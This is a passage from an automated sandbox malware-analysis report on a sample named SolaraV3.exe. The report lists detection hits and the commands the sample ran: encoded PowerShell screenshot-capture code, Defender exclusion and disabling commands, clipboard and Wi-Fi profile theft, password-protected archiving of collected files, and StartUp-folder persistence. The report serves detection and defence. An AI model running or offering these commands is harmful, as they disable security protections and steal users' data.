gACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYw
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SolaraV3.exe", ParentImage: C:\Users\user\Desktop\SolaraV3.exe, ParentProcessId: 4892, ParentProcessName: SolaraV3.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7532, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SolaraV3.exe", ParentImage: C:\Users\user\Desktop\SolaraV3.exe, ParentProcessId: 4892, ParentProcessName: SolaraV3.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'", ProcessId: 1652, ProcessName: cmd.exe
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\SolaraV3.exe, ProcessId: 4892, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\SolaraV3.exe, ProcessId: 4892, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\SolaraV3.exe, ProcessId: 4892, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr
              Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 7312, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP", ProcessId: 7932, ProcessName: cvtres.exe
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5736, TargetFilename: C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *, CommandLine: C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8024, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *, ProcessId: 7696, ProcessName: rar.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1660, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 6044, ProcessName: powershell.exe
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6924, ProcessName: svchost.exe

              Data Obfuscation

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYw

              Stealing of Sensitive Information

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SolaraV3.exe", ParentImage: C:\Users\user\Desktop\SolaraV3.exe, ParentProcessId: 4892, ParentProcessName: SolaraV3.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7888, ProcessName: cmd.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-04T15:33:04.576286+020028577521A Network Trojan was detected149.154.167.220443192.168.2.749733TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-04T15:33:02.791270+020028577511A Network Trojan was detected192.168.2.749733149.154.167.220443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: SolaraV3.exeReversingLabs: Detection: 55%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE8901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,110_2_00007FF74EE8901C
              Source: SolaraV3.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: SolaraV3.exe, 00000002.00000002.2054170176.00007FFB1E4C1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: SolaraV3.exe, 00000002.00000002.2046985205.00007FFB0B7FC000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SolaraV3.exe, 00000001.00000003.1559590237.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2053703446.00007FFB1C3C1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.1.dr
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2051655996.00007FFB0C5F1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2051929047.00007FFB18B71000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SolaraV3.exe
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: SolaraV3.exe, 00000002.00000002.2051343700.00007FFB0C5DB000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: SolaraV3.exe, 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python310.pdb source: SolaraV3.exe, 00000002.00000002.2049056875.00007FFB0BECF000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2053917460.00007FFB1E471000.00000040.00000001.01000000.00000012.sdmp
